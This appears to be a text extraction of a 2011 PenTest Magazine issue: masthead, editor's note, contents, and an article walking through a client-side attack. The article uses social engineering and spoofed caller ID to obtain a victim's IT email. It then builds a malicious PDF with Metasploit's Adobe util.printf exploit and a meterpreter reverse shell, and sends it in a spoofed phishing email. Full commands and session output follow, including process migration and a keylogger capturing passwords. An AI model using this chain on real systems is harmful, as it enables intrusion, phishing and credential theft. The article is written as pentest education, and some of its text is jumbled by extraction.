Hi I Hacked Your Computer

http://pentestmag.com08/2011 (8) December

EDITORS NOTE08/2011 (08)

TEAMManaging Editor: Maciej [email protected]

Associate Editor: Shane [email protected]

Betatesters / Proofreaders: Rishi Narang, Aby Rao, Jeff Weaver, Ed Werzyn, Daniel Wood

Senior Consultant/Publisher: Pawe Marciniak

CEO: Ewa [email protected]

Art Director: Ireneusz Pogroszewski [email protected]: Ireneusz Pogroszewski

Production Director: Andrzej Kuca [email protected]

Front page photo by: www.scribbletime.com

Publisher: Software Press Sp. z o.o. SK02-682 Warszawa, ul. Bokserska 1Phone: 1 917 338 3631www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.All trade marks presented in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.To create graphs and diagrams we used program by

Mathematical formulas created by Design Science MathType

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Ho! Ho! Ho!The Christmas time is approaching slowly. Although its still almost a month until Christmas time, and many of us still dont think about it, weve decided to make this pre-Christmas surprise for you, and this time, weve made a small PenTest mishmash, so everyone who looks inside our magazine, will find something for him at last, Christmas is a time for everyone to have joy! Another part of this surprise is also a new column called PainPill, which is authored by Dean Bushmiller. Anyway, lets take a closer look on what you can find here.

If youll jump to page 5, youll meet there our friend Aniket Kulkarni, who finally delivered us the second part of his article about Fuzzing. Inasmuch in the previous part you could have familiarized with the theory of fuzzing, this time aniket brings you some practice on plate. Next to Anikets article you can find Milinds Bhargava piece about Client Side Exploits, with attention-drawing title Hi! I hacked your computer. Milind would show you how to compromise the client side systems with the method involving social engineering. However, if youre not into fuzzing nor social engineering, see the next section Standard. This time, weve got here three different articles. First one, brought to us by our new contributor Ric Messier talks about stealth testing technique using NMAP. Ric is making an interesting remark about doing testing where operations staff is unaware of your activities. To read more, just jump to the page 20. Second article will get you straight to the sky, as it speaks about scanning cloud environment. In this short piece Steve Markey will give you all the essential information you may need on this topic. Third one, written by Srinivasan Sundara Rajan talks about BatchPenetration Testing. The author speaks about the importance of batch job in web app pentesting. For those, who felt that there was not enough information about SQL Injection in the previous issue, weve got something for you! Go to the page 34 and youll find out how to defend against SQL attacks and execute them. The author of this paper is Luis Davila. If we go to the page 38, we can see Shane MacDougall in action again. Hes coming back to us after a short absence with the paper about social engineering. Well, this article surely doesnt need recommendation. Right next to the Shanes article you can find a PainPill. Here Dean talks about the law issues concerning IT security specialists, and this one is a must for everyone whos working in the business. In the next issues Dean will be bringing us more interesting stuff, so stay tuned! And finally, at the end of this issue you will find an interview with Sumit Siddharth, author of popular security blog notsosecure.com, speaker at many prestigious conferences and head of Penetration Testing at 7Safe Ltd. We hope, you will find this issue of PenTest compelling and worthful.

Thank you all for your great support and invaluable help.

Enjoy reading!Maciej Kozuszek & PenTest Team

http://pentestmag.com08/2011 (8) December

CONTENTS

FUZZINGFuzzing The art of Security Testing, Craft it, Analyze itBy Aniket Kulkarni

This article allows the reader understand the basics of fuzzing as well as the strengths, depth and effect of fuzzing. It explains how fuzzing is done in a practical sense, and shows the basics of initial data analysis and configurations. There is more of an emphasis on utilizing SPIKEfile for file fuzzing and Spike for packet/network Fuzzing.

CLIENT SIDE EXPLOITSHi! I Hacked Your ComputerBy Milind Bhargava

With every passing day, with each new software, hackers around the world start looking for vulnerabilities and write exploit codes for them. Patching those vulnerabilities takes a lot of time and by then the systems have been compromised. As an attacker, there are many ways to compromise the client side systems, my preferred method involves social engineering.

STANDARDStealth Testing Using NMAPBy Ric Messier

While testing is often accomplished with the full knowledge and cooperation of a client, you may also be engaged to do testing where the operations staff is unaware of your activities. You may be used to test defenses where they are not allowed to prepare specifically for you or the client may simply want to know how their operations staff responds to events and if they can detect them.

Scanning Your Cloud EnvironmentBy Steve Markey

The cloud is a reality for IT professionals, but how secure is it? Since Cloud Service Providers (CSPs) do not allow cloud consumers to individually test their environments why not use a third party Vulnerability Assessment Scanner (VAS) tool/service?

BatchPenetration Testing vs Batch JobsBy Srinivasan Sundara Rajan

We are seeing various tools and methodologies to perform the penetration testing for online web applications and ensure that these applications are not compromised with attacks like Cross Site Scripting, SQL Injection and others.

SQL INJECTIONSQL Injection: Is it still a viable way to hack?By Luis Davila

SQL Injection has been known as an old vector of attack but it also has new variants and methods. It does not matter if it is a PYME or a big company, all of them can suffer from SQL injection vulnerabilities and their data would be at risk. As an example, Sony was hacked this year using SQL Injection as the method of attack and network user data was stolen.

COLUMNEffective Social Engineering: Why The Lowest Hanging Fruit Yields a Rotten CropBy Shane MacDougall

This months article is a partial summary of the talk I gave at the ToorCon Security Conference in San Diego this October. This year the conference focused quite heavily on social engineering, and if that trend continues, professional schmoozers might well consider making the trip to Southern California next year.

PAINPILLThe Business side of Pen TestingBy Dean Bushmiller

If you are doing your job as a penetration tester attacking networks for hire, someone in some jurisdiction is going to think you are breaking the law and that they have jurisdiction over you. Eventually, someone is going to call the police. Eventually, the police or some Three-Letter-Agency is going to view the tester as a real threat that must be stopped. In his articles, Dean will talk about a different security topic every month.

INTERVIEWInterview with Sumit SiddharthBy Arao

Sumit sid Siddharth works as a Head of Penetration Testing for 7Safe Limited in the UK. He has over 7 years of experience within the IT security industry. He specializes in the application and database security. Over the years, he has contributed a number of white-papers, articles, advisory, tools and exploits to the industry. He has been a speaker at many security conferences including Black Hat, DEF CON, OWASP Appsec, Troopers, Sec-T etc. He also runs the popular IT security blog: http://www.notsosecure.com.

06

14

20

38

24

34

42

44

28

CLIENT SIDE EXPLOITS

Page 14 http://pentestmag.com08/2011 (8) December Page 15 http://pentestmag.com08/2011 (8) December

Imagine you receive a PDF attachment from a friend or a colleague, you open it and you get an Figure 2 PDF attachments because the file maybe damaged or not created properly. Your first thought is that the source may not be good, you run it through antivirus and it shows the file is clean; this gives you the feeling of safety.

You now click ok to continue with your tasks to ask your IT for help for to try something else.

You didnt realize that you just got owned!In a traditional scenario, an attacker would do

dumpster diving and get emails and other printouts to get some information about you.

I feel there are better ways to get such information and thats where the art of social engineering comes in. Many a times I have used social engineering techniques to prove that anything can be done if you know how to talk your way through it. In our scenario our attacker has been doing a lot of information gathering using tools such as the (MetaSploit Framework), (Maltego) and other tools to gather email addresses and information to launch a social engineering client side attack on the victim.

VulnerabilityDescriptionA remote overflow exists in Adobe Reader and Adobe Acrobat. The document reader fails to properly bounds check input to the util.printf() javascript function resulting in a stack-based overflow. With a specially

crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

ClassicationLocation: Remote / Network AccessAttack Type: Input ManipulationImpact: Loss of IntegritySolution: UpgradeExploit: Exploit Public, Exploit CommercialDisclosure: OSVDB Verified, Vendor Verified

ScenarioFor our demonstration we will talk about how the said Social Engineering will be done to extract the required information. First we choose a victim, then we do go to their website and search the careers section for the available IT Jobs of the company to find out what jobs are vacant, their individual descriptions will give us the information about various software technologies in use.

Getting a brief idea, we can then search major vendors websites for their testimonials or clients. Every vendor displays its client list on its website proudly to show credibility and to have major organizations vouch for their quality and work.

A call to these vendors posing as a large organization, spoofing your caller id to reflect the same and talking to them, we can ask them to tell us about the victim company, saying we have worked with them before,

Hi!

With every passing day, with each new software, hackers around the world start looking for vulnerabilities and write exploit codes for them. Patching those vulnerabilities takes a lot of time and by then the systems have been compromised. As an attacker, there are many ways to compromise the client side systems, my preferred method involves social engineering.

I hacked your computer



mail id is in the victims hierarchy the better it is for the attacker.

After a successful Social Engineering session and scraping for emails from the web, you have gained two key pieces of information.

They use XYZ Computers for technical services. The IT Dept has an email address of

[email protected]

we like the products you gave to them, and would like to have the same products for us. Or it can be saying that we have seen your client list and are not sure if we can trust them saying you are new to this region etc. Have the vendor give you the email address of the IT contact they have in the company so you can ask them personally about the vendors claim of excellent services. Most vendors will oblige to this thinking it will be good for this business. The higher the owner of the

Listing 1. Creating malicious PDF le

msf > use exploit/windows/fileformat/adobe_utilprintf

msf exploit(adobe_utilprintf) > set FILENAME XYZComputers-UpgradeInstructions.pdf

FILENAME => XYZComputers-UpgradeInstructions.pdf

msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128

LHOST => 192.168.8.128

msf exploit(adobe_utilprintf) > set LPORT 4455

LPORT => 4455

msf exploit(adobe_utilprintf) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME XYZComputers-UpgradeInstructions.pdf yes The file name.

OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The location of the file.

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 192.168.8.128 yes The local address

LPORT 4455 yes The local port

Exploit target:

Id Name

-- ----

0 Adobe Reader v8.1.2 (Windows XP SP3 English)

Listing 2. PDF le created

msf exploit(adobe_utilprintf) > exploit

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Creating 'XYZComputers-UpgradeInstructions.pdf' file...

[*] Generated output file /pentest/exploits/framework3/data/exploits/XYZComputers-UpgradeInstructions.pdf

[*] Exploit completed, but no session was created.

msf exploit(adobe_utilprintf) >



Now what?We want to gain shell on the IT Departments computer and run a key logger to gain passwords, intel about possible confidential things in use or any other juicy tidbits of info we can get our hands on.

We start off by loading our (MetaSploit Framework) msfconsole.

After we are loaded we want to create a malicious PDF that will give the victim a sense of security in opening it. To do that, it must appear legit, have a title that is realistic, and not be flagged by anti-virus or other security alert software. We are going to be using the Adobe Reader util.printf() JavaScript Function Stack Buffer Overflow Vulnerability.

Listing 3. Setting up multi handler listener

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LPORT 4455

LPORT => 4455

msf exploit(handler) > set LHOST 192.168.8.128

LHOST => 192.168.8.128

msf exploit(handler) > exploit



[*] Starting the payload handler...

Listing 4. Creating hacking e-mail

root@bt:~# sendEmail -t [email protected] -f [email protected] -s 192.168.8.131 -u Important Upgrade

Instructions -a /tmp/XYZComputers-UpgradeInstructions.pdf

Reading message body from STDIN because the '-m' option was not used.

If you are manually typing in a message:

First line must be received within 60 seconds.

End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading

and securing your software. Please read and let us know if you have any problems.

Sincerely,

XYZ Computers Tech Support

Aug 24 17:32:51 bt sendEmail[13144]: Message input complete.

Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully!

Listing 5. What displays on the attackers machine screen...



[*] Starting the payload handler...

[*] Sending stage (718336 bytes)

session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322)

meterpreter >



Adobe Reader is prone to stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.

So we start by creating our malicious PDF file for use in this client side attack (Listing 1).

Once we have all the options set the way we want, we run exploit to create our malicious file (Listing 2).

So we can see that our pdf file was created in a sub-directory of where we are. So lets copy it to our /tmp directory so it is easier to locate later on in our exploit.

Listing 6. Further exploiting

meterpreter > ps

Process list

============

PID Name Path

--- ---- ----

852 taskeng.exe C:\Windows\system32\taskeng.exe

1308 Dwm.exe C:\Windows\system32\Dwm.exe

2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe

2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe

3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe

3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP

[*] Current server process: svchost.exe (1076)

[*] Migrating to explorer.exe...

[*] Migrating into process ID 816

[*] New server process: Explorer.EXE (816)

meterpreter > sysinfo

Computer: OFFSEC-PC

OS : Windows Vista (Build 6000, ).

meterpreter > use priv

Loading extension priv...success.

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against V-MAC-XP

[*] Starting the keystroke sniffer...

[*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt

[*] Recording keystrokes...

root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt

Keystroke log started at Wed Mar 23 09:18:36 -0600 2011

Support, I tried to open this file 2-3 times with no success. I even had my admin and CFO try it, but no

one can get it to open. I turned on the remote access server so you can log in to fix our problem. Our user name

is admin and password for that session is 123456. Call me when you are done. Thanks IT Dept


Page 18 http://pentestmag.com08/2011 (8) December

Before we send the malicious file to our victim we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener (Listing 3).

Now that our listener is waiting to receive its malicious payload we have to deliver this payload to the victim and since in our information gathering we obtained the email address of the IT Department we will use a handy little script called sendEmail to deliver this payload to the victim. With a kung-fu one-liner, we can attach the malicious pdf, use any smtp server we want and write a pretty convincing email from any address we want... (Listing 4).

As we can see here, the script allows us to put any FROM (-f) address, any TO (-t) address, any SMTP (-s) server as well as Titles (-u) and our malicious attachment (-a). Once we do all that and press enter we can type any message we want, then press CTRL+D and this will send the email out to the victim.

Now on the victims machine, our IT Department employee is getting in for the day and logging into his computer to check his email.

He sees the very important document and copies it to his desktop as he always does, so he can scan this with his favorite anti-virus program.

As we can see, it passed with flying colors so our IT admin is willing to open this file to quickly implement these very important upgrades. Clicking the file opens

Adobe but shows a greyed out window that never reveals a PDF. The greyed out window looks like this: (Figur 2 Adobe Reader Vulnerability). And then, on the attackers machine what is revealed... (Listing 5).

We now have a shell on their computer through a malicious PDF client side attack. Of course what would be wise at this point is to move the shell to a different process, so when they kill Adobe we dont lose our shell. Then obtain system info, start a key logger and continue exploiting the network (Listing 6).

ConclusionAnd thats it, its game over for the victim. The attacker can now not only get hold of sensitive information but also copy any data from the victims computer. This vulnerability affects Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument.

SolutionUpgrade to version 8.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Or in a really bad case, reinstall your OS.

Figure 1. PDF Virus Check

Figure 2. Adobe Reader not able to open

Bibliography Adobe Reader Vulnerability. (n.d.). Retrieved from http://

about-threats.trendmicro.com Maltego. (n.d.). Retrieved from http://www.paterva.com/

web5/ MetaSploit Framework. (n.d.). Retrieved from http://

metasploit.com/ Exploit Source code: http://dev.metasploit.com/redmine/

projects/framework/repository/entry/modules/exploits/windows/browser/adobe_utilprintf.rb

CVE-2008-2992: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992

49520: Adobe Reader / Acrobat util.printf() Function Cra-fted PDF File Handling Overow: http://osvdb.org/49520

MILIND BHARGAVAMilind Bhargava, (CEH), (ECSA) is in love with the eld of Information Security, in pursuit of his love he has completed his CEH & ECSA certications in 2010 from EC-Council and completed IT Security & Ethical Hacking course from Appin Noida, India. He has worked as Head of IT for an Oil & Gas MNC in Doha, Qatar, where his responsibilities included but were not limited to Network Security. He believes that ethical hacking is an addiction, which you can never master. Its a skill which you can control, but never stop learning more about. And so he continues on his quest as an eternal student.

CoverEDITORS NOTECONTENTSHi! I hacked your computer

Hi I Hacked Your Computer

Documents

Transcript of Hi I Hacked Your Computer